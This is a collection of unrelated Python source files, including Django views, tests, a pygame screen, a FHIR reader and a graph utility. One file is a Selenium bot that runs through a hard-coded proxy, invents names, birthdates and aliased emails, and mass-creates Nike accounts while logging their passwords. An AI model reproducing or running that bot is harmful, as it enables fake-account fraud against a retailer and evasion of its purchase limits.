_(u'Elixier-Fachstatistik')))
cSection = Context ( { 'section': _(u'Elixier-Statistik'), 'links': links } )
content += tSection.render ( cSection)
return content
get = request.GET.copy()
if get.has_key('elixier_op'):
if get['elixier_op'] in ['gesamt_statistik', 'fach_statistik']:
return views_statistik(request, item_container, get['elixier_op'])
elif get['elixier_op'] == 'fach_beitraege':
return views_beitraege(request, item_container, get['elixier_op'])
elif get['elixier_op'] == 'select_dest':
return views_select_dest(request, item_container, get['elixier_op'])
else:
return show_error(request, item_container, _(u'Fehlende Elixier-Funktion'),
'<p>%s: "%s"</p>' % (_(u'Die folgende Elixier-Funktion existiert nicht'),
get['elixier_op']) )
app_name = 'elixier'
vars = get_item_vars_show(request, item_container, app_name)
vars['content'] = get_section_view()
return render_to_response ( 'app/base_folderish.html', vars )
|
'''
You all have used the random library of python. You have seen in the screen-cast of how powerful it is.
In this assignment, you will sort a list let's say list_1 of numbers in increasing order using the random library.
Following are the steps to sort the numbers using the random library.
Step 1: Import the randint definition of the random library of python. Check this page if you want some help.
Step 2: Take the elements of the list_1 as input.
Step 3: randomly choose two indexes i and j within the range of the size of list_1.
Step 4: Swap the elements present at the indexes i and j. After doing this, check whether the list_1 is sorted or not.
Step 5: Repeat step 3 and 4 until the array is not sorted.
>>Input Format:
The first line contains a single number n which signifies the number of elements in the list_1.
From the second line, the elements of the list_1 are given with each number in a new line.
>>Output Format:
Print the elements of the list_1 in a single line with each element separated by a space.
NOTE 1: There should not be any space after the last element.
>>Example:
Input:
4
3
1
2
5
Output:
1 2 3 5
>>Explanation:
The first line of the input is 4. Which means that n is 4, or the number of elements in list_1 is 4. The elements of list_1 are 3, 1, 2, 5 in this order.
The sorted version of this list is 1 2 3 5, which is the output.
NOTE 2: There are many ways to sort the elements of a list. The purpose of this assignment is to show the power of randomness, and obviously it's fun.
'''
from random import randint
n=int(input())
x = [int(input()) for i in range(n)]
while True:
i, j = randint(0,n-1), randint(0,n-1)
x[i], x[j] = x[j], x[i]
if all(x[i] <= x[i+1] for i in range(len(x)-1)): break
[print(x[i], end=" " if i <len(x)-1 else "") for i in range(len(x))]
|
import json
from api import login
from api import (get_orgs, get_facultys, get_groups,
get_schedule, get_exams)
from menu_helpers import input_org_info
def create_org_structure(ip, port, username, password):
access_token, refresh_token = login(ip, port, username, password)
org_struct = {}
o_res = get_orgs(ip, port, access_token)
for org in o_res:
org_struct[org] = {}
f_res = get_facultys(ip, port, access_token, org)
for faculty in f_res:
org_struct[org][faculty] = get_groups(ip, port, access_token, org, faculty)
return org_struct
def menu_get_org_structure(ip, port, username, password):
org_structure = create_org_structure(
ip,
port,
username,
password)
print('Структура групп в БД:')
print(json.dumps(org_structure, indent=4, sort_keys=True, ensure_ascii=False))
with open('org_structure.json', 'w') as outfile:
json.dump(org_structure, outfile, indent=4, sort_keys=True)
print('Структура групп сохранена в org_structure.json')
def menu_get_schedule(ip, port, username, password):
org, faculty, group = input_org_info()
access_token, refresh_token = login(ip, port, username, password)
schedule = get_schedule(ip, port, access_token, org, faculty, group)
data = {
org:{
faculty:{
group: schedule
}
}
}
print('Расписание занятий:')
print(json.dumps(data, indent=4, sort_keys=True, ensure_ascii=False))
with open('schedule.json', 'w') as outfile:
json.dump(data, outfile, indent=4, sort_keys=True)
print('Расписание занятий группы сохранено в schedule.json')
def menu_get_exams(ip, port, username, password):
org, faculty, group = input_org_info()
access_token, refresh_token = login(ip, port, username, password)
schedule = get_exams(ip, port, access_token, org, faculty, group)
data = {
org: {
faculty: {
group: schedule
}
}
}
print('Расписание экзаменов:')
print(json.dumps(data, indent=4, sort_keys=True, ensure_ascii=False))
with open('exams.json', 'w') as outfile:
json.dump(data, outfile, indent=4, sort_keys=True)
print('Расписание занятий группы сохранено в schedule.json')
|
from selenium import webdriver
import time
from selenium.webdriver.support.ui import Select
from random import randint
from random import choice
import string
from selenium.webdriver.common.proxy import *
from lxml import html
def set_profile(pr):
profile = webdriver.FirefoxProfile()
profile.set_preference("network.proxy.type", 1)
profile.set_preference("network.proxy.http", pr['ip'])
profile.set_preference("network.proxy.http_port", int(pr['port']))
profile.set_preference("network.proxy.ssl", pr['ip'])
profile.set_preference("network.proxy.ssl_port", int(pr['port']))
return profile
def new_user():
user = {"fname":"",
"lname":"",
"email":"",
"password":"",
"month":"",
"date":"",
"year":""
}
return user
def gen_dob():
year = str(randint(1980,1996))
month = randint(1,12)
if(month < 10):
month = "0" + str(month)
else :
month = str(month)
date = randint(1,28)
if(date < 10):
date = "0" + str(date)
else:
date = str(date)
dob = month + ":" + date + ":" + year
return dob
def get_email():
user = new_user()
fp = open("config.txt", "r")
email = fp.read()
email = email.strip()
email = email.split(":")
username = email[0].split("@")
username[0] = username[0] + '+_' + str(randint(20, 99)) + choice(string.letters)
username = "@".join(username)
email[0] = username
email = ':'.join(email)
return email
def gen_name():
lastnames = [
"Carnegie",
"Roberts",
"Clinton",
"Joyce",
"Holder",
"Smith",
"Owens",
"Louden",
"Steffey",
"Rouse",
"Stagner",
"Chausse",
"White",
"Brewster",
"Kelly",
"Gurley",
"Morales",
"Grimes"
]
firstnames = [
"Alfred",
"Andrew",
"Martin",
"Harry",
"Tom",
"Michael",
"Peter",
"Robert",
"Frank",
"Matthew",
"Donald",
"Phillip",
"Paul",
"Dale",
"Christian",
"Maria",
"Stephanie",
"Evelyn",
"Caitlyn",
"Sonny",
"Julia"
]
fname = firstnames[randint(0, len(firstnames)-1)]
lname = lastnames[randint(0, len(lastnames)-1)]
name = fname + ":" + lname
return name
def gen_user():
user = new_user()
name= gen_name()
name = name.split(":")
dob = gen_dob()
dob = dob.split(":")
email = get_email()
email = email.split(":")
user['email'] = email[0]
user['password'] = email[1]
user['month'] = dob[0]
user['date'] = dob[1]
user['year'] = dob[2]
user['fname'] = name[0]
user['lname'] = name[1]
print("New user details generated are \n" + str(user))
return user
def write_to_log(fname, lname, email, password):
print("Writing " + email + ":" + password + "to file.")
fp = open("log.csv", "a+")
fp.write(fname + "," + lname + "," + email + "," + password + "\n");
fp.close()
return
def main():
pr = {'ip':'34.206.205.194','port':'41700'}
num = input("How many accounts? ")
profile = set_profile(pr)
driver = webdriver.Firefox(firefox_profile=profile)
i = 0
while(1):
user = gen_user()
try:
search_url = "https://duckduckgo.com/?q=nike+launch"
driver.get(search_url)
except:
print("Looks like the page is acting weird. RELOADIN'!")
num += 1;
continue
try:
div = driver.find_element_by_id("r1-0")
link = div.find_element_by_class_name("result__a")
link.click()
time.sleep(2);
except:
print("Looks like the page is acting weird. RELOADIN'!")
num += 1
continue
try:
login = driver.find_element_by_xpath("/html/body/div[3]/div/header/div/div/nav/div[2]/a[1]")
login.click()
time.sleep(2)
signup_btn = driver.find_element_by_link_text("Join now.")
signup_btn.click()
time.sleep(2)
except:
print("Looks like the page is acting weird. RELOADIN'!")
num += 1
continue
email_field = driver.find_element_by_name("emailAddress")
email_field.send_keys(user['email'])
time.sleep(2);
password_field = driver.find_element_by_name("password")
password_field.send_keys(user['password'])
fname_field = driver.find_element_by_name("firstName")
fname_field.send_keys(user['fname'])
lname_field = driver.find_element_by_name("lastName")
lname_field.send_keys(user['lname'])
month_select = Select(driver.find_element_by_id("nike-unite-date-id-mm"))
month_select.select_by_value(user['month'])
time.sleep(3);
date_select = Select(driver.find_element_by_id("nike-unite-date-id-dd"))
date_select.select_by_value(user['date'])
time.sleep(2);
year_select = Select(driver.find_element_by_id("nike-unite-date-id-yyyy"))
year_select.select_by_value(user['year'])
time.sleep(2);
spans = driver.find_elements_by_tag_name("span")
rand = randint(0,1000)
for span in spans:
if(rand%2 == 0):
if "Male" in span.text:
gender = span
else:
continue
else:
if "Female" in span.text:
gender = span
else:
continue
gender.click()
gender.click()
submit = driver.find_element_by_class_name("joinSubmit")
submit_btn = submit.find_element_by_tag_name("input")
submit_btn.click()
submit_btn.click()
while(1):
try:
update_select = driver.find_element_by_id("nike-unite-date-id-yyyy")
try:
time.sleep(2);
rand = randint(1000, 100000);
if(rand%2 == 1):
month_select.select_by_value(str(int(user['month']) + randint(-3,0)))
else:
date_select.select_by_value(str(int(user['date']) + randint(-4,2)))
update_select.click()
gender.click()
submit_btn.click()
submit_btn.click()
except:
continue
except:
print("Done "+ str(i+1) + " accounts!")
break
i += 1
if(i == num):
break;
write_to_log(user['fname'], user['lname'], user['email'], user['password'])
time.sleep(15);
if __name__ == "__main__":
main()
|
import unittest
from reinvent_scoring import ScoringFunctionComponentNameEnum, ComponentParameters
class BaseTestMatchingSubstructure(unittest.TestCase):
def setUp(self):
sf_enum = ScoringFunctionComponentNameEnum()
self.parameters = ComponentParameters(component_type=sf_enum.MATCHING_SUBSTRUCTURE,
name="matching_substructure",
weight=1.,
specific_parameters={"smiles":self.smiles})
|
"""
File: Milestone1.py
Name:
-----------------------
This file tests the milestone 1 for
our babyname.py project
"""
import sys
def add_data_for_name(name_data, year, rank, name):
d = {}
if name in name_data:
value = name_data[name]
for yr in value:
rk = value[yr]
if year == yr:
if int(rank) > int(rk):
rank = rk
d[yr] = rk
d[year] = rank
name_data[name] = d
else:
d[year] = rank
name_data[name] = d
# ------------- DO NOT EDIT THE CODE BELOW THIS LINE ---------------- #
def test1():
name_data = {'Kylie':{'2010':'57'}, 'Nick':{'2010':'37'}}
add_data_for_name(name_data, '2010', '208', 'Kate')
print('--------------------test1----------------------')
print(str(name_data))
print('-----------------------------------------------')
def test2():
name_data = {'Kylie': {'2010': '57'}, 'Nick': {'2010': '37'}}
add_data_for_name(name_data, '2000', '104', 'Kylie')
print('--------------------test2----------------------')
print(str(name_data))
print('-----------------------------------------------')
def test3():
name_data = {'Kylie': {'2010': '57'},'Sammy': {'1980':'451','1990': '200'}}
add_data_for_name(name_data, '1990', '90', 'Sammy')
print('-------------------test3-----------------------')
print(str(name_data))
print('-----------------------------------------------')
def test4():
name_data = {'Kylie': {'2010': '57'}, 'Nick': {'2010': '37'}}
add_data_for_name(name_data, '2010', '208', 'Kate')
add_data_for_name(name_data, '2000', '108', 'Kate')
add_data_for_name(name_data, '1990', '200', 'Sammy')
add_data_for_name(name_data, '1990', '90', 'Sammy')
add_data_for_name(name_data, '2000', '104', 'Kylie')
print('--------------------test4----------------------')
print(str(name_data))
print('-----------------------------------------------')
def main():
args = sys.argv[1:]
if len(args) == 1 and args[0] == 'test1':
test1()
elif len(args) == 1 and args[0] == 'test2':
test2()
elif len(args) == 1 and args[0] == 'test3':
test3()
elif len(args) == 1 and args[0] == 'test4':
test4()
if __name__ == "__main__":
main()
|
''' Skelly "Taffer presents..." screen class.
By Chris Herborth (https://github.com/Taffer)
MIT license, see LICENSE.md for details.
'''
import pygame
from .ScreenBase import ScreenBase
from ..ui import ColorFade
from ..ui import ImageButton
from ..ui import Label
BLACK = pygame.Color('black')
BLACK_ALPHA = pygame.Color(BLACK.r, BLACK.g, BLACK.g, 0) # BLACK, but fully transparent
WHITE = pygame.Color('white')
class PresentsScreen(ScreenBase):
def __init__(self, game) -> None:
super().__init__(game)
self.next_screen = 'Title'
self.game.resources['music']['theme'] = pygame.mixer.music.load('music/Heroic Demise (New).ogg')
pygame.mixer.music.set_volume(self.game.settings.get('music_volume') * self.game.settings.get('overall_volume'))
pygame.mixer.music.play()
self.game.resources['fonts']['default_serif'] = pygame.freetype.Font('fonts/A_Font_with_Serifs.ttf', 72)
self.game.resources['fonts']['default_mono'] = pygame.freetype.Font('fonts/LiberationMono-Bold.ttf', 16)
self.game.resources['fonts']['germania'] = pygame.freetype.Font('fonts/GermaniaOne-Regular.ttf', 18)
self.game.resources['images']['pygame_logo'] = pygame.image.load('graphics/pygame-logo.png').convert_alpha()
self.game.resources['images']['taffer'] = pygame.image.load('graphics/taffer-ronos.png').convert_alpha()
presents_text = self.game.text.get_text('presents')
self.taffer_text = presents_text['taffer_text']
self.pygame_text = presents_text['pygame_text']
self.fade = ColorFade(BLACK, BLACK_ALPHA, 1) # 1 second fade
self.fade_out = False
self.exit_countdown = 2 # Seconds after fade to auto-exit.
self.ui = []
rect = self.game.resources['images']['taffer'].get_rect()
self.ui.append(ImageButton((self.game.screen_width - rect.width) / 2, 120, self.game.resources['images']['taffer']))
rect = self.game.resources['images']['pygame_logo'].get_rect()
self.ui.append(ImageButton((self.game.screen_width - rect.width) / 2, 580, self.game.resources['images']['pygame_logo']))
self.ui.append(Label(self.game.screen_width / 2, 16, self.taffer_text, self.game.resources['fonts']['default_serif'],
WHITE, 'centre'))
self.ui.append(Label(self.game.screen_width / 2, 640, self.pygame_text, self.game.resources['fonts']['germania'],
WHITE, 'centre'))
def draw(self) -> None:
self.game.surface.fill(BLACK)
for item in self.ui:
item.draw()
self.fade.draw()
def update(self, dt: float) -> None:
self.fade.update(dt)
if self.fade_out:
# If we're fading out...
if self.fade.is_done():
self.can_exit = True
else:
# If we're fading in...
if self.fade.is_done():
self.exit_countdown = self.exit_countdown - dt
if self.exit_countdown < 0:
self.fade = ColorFade(BLACK_ALPHA, BLACK, 1)
self.fade_out = True
|
# from .views import heartbeat
def test_heartbeat(client):
response = client.get('/heartbeat/')
assert response.status_code == 200
data = response.json()
assert data['mode'] == 'simple'
assert data['status'] == 'running'
def test_heartbeat_no_ending_slash(client):
response = client.get('/heartbeat')
assert response.status_code == 301
def test_heartbeat_redis(client):
# 1st request
response = client.get('/heartbeat/redis/')
assert response.status_code == 200
data = response.json()
assert data['mode'] == 'redis'
assert data['status'] == 'running'
hit1 = data['hits']
assert hit1 > 0
# 2nd request
response2 = client.get('/heartbeat/redis/')
assert response2.status_code == 200
data2 = response2.json()
hit2 = data2['hits']
assert hit1 + 1 == hit2
|
t = int(input())
for _ in range(t):
n, m = map(int, input().split())
a = set(list(map(int, input().split())))
b = set(list(map(int, input().split())))
print(len(a.intersection(b))) |
# ------------------------------------------------------------------------
# coding=utf-8
# ------------------------------------------------------------------------
"""
Media library-based file inclusion tool. Can handle any type of media file,
not only images.
"""
import warnings
from django import forms
from django.conf import settings
from django.contrib.admin.widgets import AdminRadioSelect
from django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist
from django.db import models
from django.template.loader import render_to_string
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from feincms.admin.item_editor import ItemEditorForm
from feincms.module.medialibrary.models import MediaFile
from feincms.module.medialibrary.thumbnail import admin_thumbnail
warnings.warn("The contents of feincms.content.medialibrary.models will be replaced"
" with feincms.content.medialibrary.v2 in FeinCMS v1.7. The old media file content"
" here interferes with Django's raw_id_fields and is generally messy.",
DeprecationWarning, stacklevel=2)
class MediaFileWidget(forms.TextInput):
"""
TextInput widget, shows a link to the current value if there is one.
"""
def render(self, name, value, attrs=None):
inputfield = super(MediaFileWidget, self).render(name, value, attrs)
if value:
try:
mf = MediaFile.objects.get(pk=value)
except MediaFile.DoesNotExist:
return inputfield
try:
caption = mf.translation.caption
except (AttributeError, ObjectDoesNotExist):
caption = _('(no caption)')
image = admin_thumbnail(mf)
if image:
image = u'<img src="%(url)s" alt="" /><br />' % {'url': image}
else:
image = u''
return mark_safe(u"""
<div style="margin-left:10em">%(image)s
<a href="%(url)s" target="_blank">%(caption)s - %(url)s</a><br />
%(inputfield)s
</div>""" % {
'image': image,
'url': mf.file.url,
'caption': caption,
'inputfield': inputfield})
return inputfield
# FeinCMS connector
class MediaFileContent(models.Model):
"""
Create a media file content as follows::
Page.create_content_type(MediaFileContent, POSITION_CHOICES=(
('default', _('Default')),
('lightbox', _('Lightbox')),
('whatever', _('Whatever')),
))
For a media file of type 'image' and position 'lightbox', the following
templates are tried in order:
* content/mediafile/image_lightbox.html
* content/mediafile/image.html
* content/mediafile/lightbox.html
* content/mediafile/default.html
The context contains ``content`` and ``request`` (if available).
"""
feincms_item_editor_includes = {
'head': ['admin/content/mediafile/init.html'],
}
class Meta:
abstract = True
verbose_name = _('media file')
verbose_name_plural = _('media files')
@classmethod
def initialize_type(cls, POSITION_CHOICES=None, MEDIAFILE_CLASS=MediaFile):
warnings.warn('feincms.content.medialibrary.models.MediaFileContent is deprecated.'
' Use feincms.content.medialibrary.v2.MediaFileContent instead.',
DeprecationWarning, stacklevel=2)
if 'feincms.module.medialibrary' not in settings.INSTALLED_APPS:
raise ImproperlyConfigured, 'You have to add \'feincms.module.medialibrary\' to your INSTALLED_APPS before creating a %s' % cls.__name__
if POSITION_CHOICES is None:
raise ImproperlyConfigured, 'You need to set POSITION_CHOICES when creating a %s' % cls.__name__
cls.add_to_class('mediafile', models.ForeignKey(MEDIAFILE_CLASS, verbose_name=_('media file'),
related_name='%s_%s_set' % (cls._meta.app_label, cls._meta.module_name)
))
cls.add_to_class('position', models.CharField(_('position'),
max_length=10, choices=POSITION_CHOICES,
default=POSITION_CHOICES[0][0]))
class MediaFileContentAdminForm(ItemEditorForm):
mediafile = forms.ModelChoiceField(queryset=MEDIAFILE_CLASS.objects.all(),
widget=MediaFileWidget, label=_('media file'))
position = forms.ChoiceField(choices=POSITION_CHOICES,
initial=POSITION_CHOICES[0][0], label=_('position'),
widget=AdminRadioSelect(attrs={'class': 'radiolist'}))
cls.feincms_item_editor_form = MediaFileContentAdminForm
def render(self, **kwargs):
return render_to_string([
'content/mediafile/%s_%s.html' % (self.mediafile.type, self.position),
'content/mediafile/%s.html' % self.mediafile.type,
'content/mediafile/%s.html' % self.position,
'content/mediafile/default.html',
], { 'content': self }, context_instance=kwargs.get('context'))
@classmethod
def default_create_content_type(cls, cms_model):
return cms_model.create_content_type(cls, POSITION_CHOICES=(
('block', _('block')),
('left', _('left')),
('right', _('right')),
))
|
from abc import ABC, abstractmethod
from ..utils import *
import pandas as pd
class AbstractBatchTransformation(ABC):
"""
An abstract class for transformations to be applied
to input data.
"""
@abstractmethod
def __init__(self, **kwargs):
"""
Initializes the transformation and provides an
opporunity to supply a configuration if needed
"""
pass
@abstractmethod
def __call__(self, batch):
"""
Apply the transformation to a batch of (X, y)
pairs
Parameters
----------
batch : list-like
The batch of text inputs and associated targets
"""
pass
@abstractmethod
def get_task_configs(self, task_name=None, tran_type=None, label_type=None):
"""
See self._get_task_configs()
"""
pass
def _get_task_configs(self, tran_types, task_name=None, tran_type=None, label_type=None):
"""
Defines the task and type of transformation (SIB or INV)
to determine the effect on the expected behavior (whether
to change the label if SIB, or leave the label alone if INV).
Parameters
----------
task_name : str
Filters the results for the requested task.
tran_type : str
Filters the results for the requested trans type,
which is either 'INV' or 'SIB'.
label_type : str
Filters the results for the requested label type,
which is either 'hard' or 'soft'.
Returns
-------
df : pandas.DataFrame
A pandas DataFrame containing:
- task_name : str
short description of the task
- tran_type : str
INV == invariant ==> output behavior does
not change
SIB == sibylvariant ==> output behavior
changes in some way
- label_type : str
whether to use soft or hard labels
"""
df = pd.DataFrame.from_dict(tran_types)
if task_name is not None:
task_names = set(df.task_name.tolist())
if task_name not in task_names:
raise ValueError('The selected task must be one of the following: {}'.format(', '.join(task_names)))
df = df[df['task_name'] == task_name]
if tran_type is not None:
tran_types = set(df.tran_type.tolist())
if tran_type not in tran_types:
raise ValueError('The selected tran type must be one of the following: {}'.format(', '.join(tran_types)))
df = df[df['tran_type'] == tran_type]
if label_type is not None:
label_types = set(df.label_type.tolist())
if label_type not in label_types:
raise ValueError('The selected label type must be one of the following: {}'.format(', '.join(tran_types)))
df = df[df['label_type'] == label_type]
return df |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import unittest
from superset.utils.log import DBEventLogger, get_event_logger_from_cfg_value
class TestEventLogger(unittest.TestCase):
def test_returns_configured_object_if_correct(self):
# test that assignment of concrete AbstractBaseClass impl returns unmodified object
obj = DBEventLogger()
res = get_event_logger_from_cfg_value(obj)
self.assertTrue(obj is res)
def test_event_logger_config_class_deprecation(self):
# test that assignment of a class object to EVENT_LOGGER is correctly deprecated
res = None
# print warning if a class is assigned to EVENT_LOGGER
with self.assertLogs(level="WARNING"):
res = get_event_logger_from_cfg_value(DBEventLogger)
# class is instantiated and returned
self.assertIsInstance(res, DBEventLogger)
def test_raises_typerror_if_not_abc_impl(self):
# test that assignment of non AbstractEventLogger derived type raises TypeError
with self.assertRaises(TypeError):
get_event_logger_from_cfg_value(logging.getLogger())
|
class Resp(dict):
def __init__(self, data=None, code=200, msg="success"):
super().__init__()
self['data'] = data
self['code'] = code
self['msg'] = msg |
class SimpleFhirR4Reader(object):
"""
A lightweight accessor for a FHIR R4 resource. Not intended to replace the fhirclient library.
This class does not attempt any validation or impose any structure. It is only intended to aid in
reading from FHIR-like data structures.
When performing list lookups, return the first item in the list that matches the given parameters.
"""
def __init__(self, fhir_data_structure, root=None):
self._root = root or self
self._obj = fhir_data_structure
def get(self, *lookup_path, **dict_lookup_keys):
obj = self._obj
if dict_lookup_keys:
lookup_path = lookup_path + (dict_lookup_keys,)
for key in lookup_path:
obj = self._lookup_obj_key(obj, key)
if self.is_reference(obj):
obj = self._resolve_reference(obj)
if isinstance(obj, (list, dict)):
return SimpleFhirR4Reader(obj, root=self)
return obj
def __getattr__(self, item):
try:
return self.get(item)
except (ValueError, KeyError):
raise AttributeError("{!r} can't be found in {!r}".format(item, self._obj))
def __getitem__(self, item):
if isinstance(item, slice):
if isinstance(self._obj, list):
return self._obj[item]
raise TypeError("{!r} can't be found in {!r}".format(item, self._obj))
try:
return self.get(item)
except ValueError:
if isinstance(self._obj, list):
raise IndexError("{!r} can't be found in {!r}".format(item, self._obj))
raise KeyError("{!r} can't be found in {!r}".format(item, self._obj))
@staticmethod
def is_reference(obj):
return isinstance(obj, dict) and list(obj.keys()) == ["reference"]
def _resolve_reference(self, obj):
reference_parts = obj["reference"].split("/")
reference_type = None
try:
reference_type, reference_id = reference_parts
except ValueError:
reference_id = reference_parts[0]
reference_id = reference_id.lstrip("#")
if reference_type:
return self._root.contained.get(id=reference_id, resourceType=reference_type)
return self._root.contained.get(id=reference_id)
@staticmethod
def _lookup_obj_key(obj, key):
if isinstance(obj, dict):
if callable(key):
return list(filter(key, list(obj.items())))
return obj[key]
if isinstance(obj, list):
if isinstance(key, dict): # dict key based lookup
for x in obj:
if _dict_has_values(x, **key):
return x
if isinstance(key, int):
return obj[key]
if callable(key):
return list(filter(key, obj))
raise ValueError("could not lookup '{!r}' from {!r}".format(key, obj))
def _dict_has_values(obj, **queries):
for key, value in list(queries.items()):
try:
if obj[key] != value:
return False
except KeyError:
return False
return True
|
# coding: UTF-8
from functools import reduce
import networkx as nx
try:
import pygraphviz as pgv
except Exception:
print("No graphviz")
pass
def create_document_graph(document_item):
# Create Document Graph
graph = nx.DiGraph()
# Add nodes
nodes = reduce(lambda x,y: x+y, [sent["nodes"] for sent in document_item["sentences"]])
for i_node in range(len(nodes)):
graph.add_node(i_node, label=nodes[i_node]["lemma"])
# Add edge
for i_node, node in enumerate(nodes):
for arc in node["arcs"]:
link = arc["label"]
if link[:8] == "adjsent:":
# Connection via coreference is better than simple adjacency.
weight = 10.0
elif link[:6] == "coref:":
weight = 1.0
elif (link[:7] == "deparc:") or (link[:7] == "depinv:"):
weight = 1.0
else:
continue
from_ind = i_node
to_ind = arc["toIndex"]
# Skip link to ROOT
if min(from_ind, to_ind) < 0:
continue
graph.add_edge(from_ind, to_ind, label=link, weight=weight)
return graph
def draw_document_graph(document_item, output="tmp.png"):
graph = create_document_graph(document_item)
for edge in graph.edges:
graph[edge[0]][edge[1]]["fontsize"] = 10
g = nx.nx_agraph.to_agraph(graph)
g.draw(output, prog="fdp")
class PatternPairwiseShortestPath(object):
def __init__(self, doc_graph, n_entity, min_paths):
u"""
min_path: (from_ent_ind, to_ent_ind) -> path
path is list of index of node in the document graph
"""
def get_link_name(i_from, i_to):
link = doc_graph.edges[i_from, i_to]["label"]
flip = False
arrow = "<-" if flip else "->"
link = "{}{}{}".format(arrow, link, arrow)
return link
contained_links = [] # list of (from_ind, to_ind, link_label)
new_paths_dict = {}
node_ind_lst = []
node_lemma_lst = []
new_paths = []
for i_ent1 in range(n_entity):
for i_ent2 in range(n_entity):
if i_ent2 == i_ent1:
continue
path = min_paths[i_ent1, i_ent2]
for node_ind in path[1:-1]:
if node_ind not in node_ind_lst:
node_ind_lst.append(node_ind)
node_lemma_lst.append(doc_graph.nodes[node_ind]["label"])
new_path = []
for i_pos in range(len(path)-1):
if i_pos != 0:
new_path.append(node_ind_lst.index(path[i_pos]))
link = get_link_name(path[i_pos], path[i_pos+1])
new_path.append(link)
i_from, i_to = path[i_pos], path[i_pos+1]
contained_links.append(
(i_from, i_to, doc_graph.edges[i_from, i_to]["label"])
)
new_paths.append(tuple(new_path))
new_paths_dict[(i_ent1, i_ent2)] = tuple(new_path)
self.node_lemma = tuple(node_lemma_lst)
self.new_paths = tuple(new_paths)
self.contained_links = set(contained_links)
self.new_paths_dict = new_paths_dict
def get_subpaths(self):
paths = []
for _k, _p in self.new_paths_dict.items():
p = []
for tok in _p:
if isinstance(tok, int):
tok = self.node_lemma[tok]
p.append(tok)
paths.append((_k, tuple(p)))
return paths
def __eq__(self, other):
if not isinstance(other, PatternPairwiseShortestPath):
return False
return (self.node_lemma == other.node_lemma) and (self.new_paths == other.new_paths)
def __hash__(self):
return hash((self.node_lemma, self.new_paths))
def __str__(self):
return str((self.node_lemma, self.new_paths))
def extract_pairwise_shortest_paths(document_item):
if min([len(ent["indices"]) for ent in document_item["entities"]]) < 1:
print("There is an entity with no indices.")
return None
doc_graph = create_document_graph(document_item)
# Find pairwise shortest paths between each entity pairs.
min_paths = {}
for i_ent1, entity1 in enumerate(document_item["entities"]):
for i_ent2, entity2 in enumerate(document_item["entities"]):
if i_ent2 == i_ent1:
continue
# Find shortest path
min_length = None
min_path = None
for from_ind in entity1["indices"]:
for to_ind in entity2["indices"]:
try:
path = nx.dijkstra_path(doc_graph, from_ind, to_ind, "weight")
except nx.exception.NetworkXNoPath:
continue
path_len = len(path) - 1
if (min_length is None) or (path_len < min_length):
min_length = path_len
min_path = path
if min_path is None:
draw_document_graph(document_item, "error.png")
draw_document_graph(document_item, "error2.png")
print("Document graph is dumped in error.png")
print("Entities are: {}".format(document_item["entities"]))
raise Exception("No shortest path between entity {} and {}".format(i_ent1, i_ent2))
min_paths[i_ent1, i_ent2] = min_path
return PatternPairwiseShortestPath(doc_graph, len(document_item["entities"]),
min_paths)
if __name__=="__main__":
from util import load_data
items, indmap, _observed_tuples, arities = load_data("wikismall.data.json", tuple_type="ent_index")
for key in items["train"]:
sample_doc = items["train"][key]["docs"][0]
tokens = []
for sent in sample_doc["sentences"]:
for node in sent["nodes"]:
tokens.append(node["label"])
raw_sent = " ".join(tokens)
ents = [ent for ent in sample_doc["entities"]]
print(ents)
print(raw_sent)
pair = extract_pairwise_shortest_paths(sample_doc)
for sp in pair.get_subpaths():
print(sp)
print("==============================")
input()
|
from django.db import models
from posts.models import Post
import uuid
from main import models as mainModels
from main import utils
class Comment(models.Model):
type = "comment"
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
author = models.JSONField()
comment = models.TextField(blank=True, null=True)
published = models.DateTimeField(auto_now_add=True)
post = models.ForeignKey(Post, on_delete=models.CASCADE)
CT_MARKDOWN = 'text/markdown' # CommonMark
CT_PLAIN = 'text/plain' # utf-8
CT_HTML = 'text/html' # TODO: strip tags
CT_BASE64 = 'application/base64'
CT_PNG = 'image/png;base64' # embedded png
CT_JPG = 'image/jpeg;base64' # embedded jpeg
CONTENT_TYPE_CHOICES = [
('Text', (
(CT_MARKDOWN, 'markdown'),
(CT_PLAIN, 'plain'),
(CT_HTML, 'html'),
)),
('Encoded Text', (
(CT_BASE64, 'base64'),
)),
('Image', (
(CT_PNG, '.png'),
(CT_JPG, '.jpg'),
)),
]
contentType = models.CharField(
max_length=18,
choices=CONTENT_TYPE_CHOICES,
default=CT_MARKDOWN
)
def get_id_url(self):
return f'{utils.FRONTEND_HOST}/author/{str(self.post.author.id)}/posts/{str(self.post.id)}/comments/{self.id}'
|
n=0
s=0
c=0
n=int(input("Digite o valor inicial: "))
while n != 999:
s=s+n
c=c+1
n=int(input("Digite o valor para continuar a soma: "))
print('O valor total somado foi: {}\nForam digitados: {} numeros'.format(s,c))
|
"""
Copyright 2018-2021 Board of Trustees of Stanford University
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
#!/usr/bin/python3
import matplotlib.image as mpimg
import numpy as np
import base64
import sys
import os
def main():
if len(sys.argv) != 2:
print("Usage: ./img_to_base64.py <image-path>")
sys.exit(1)
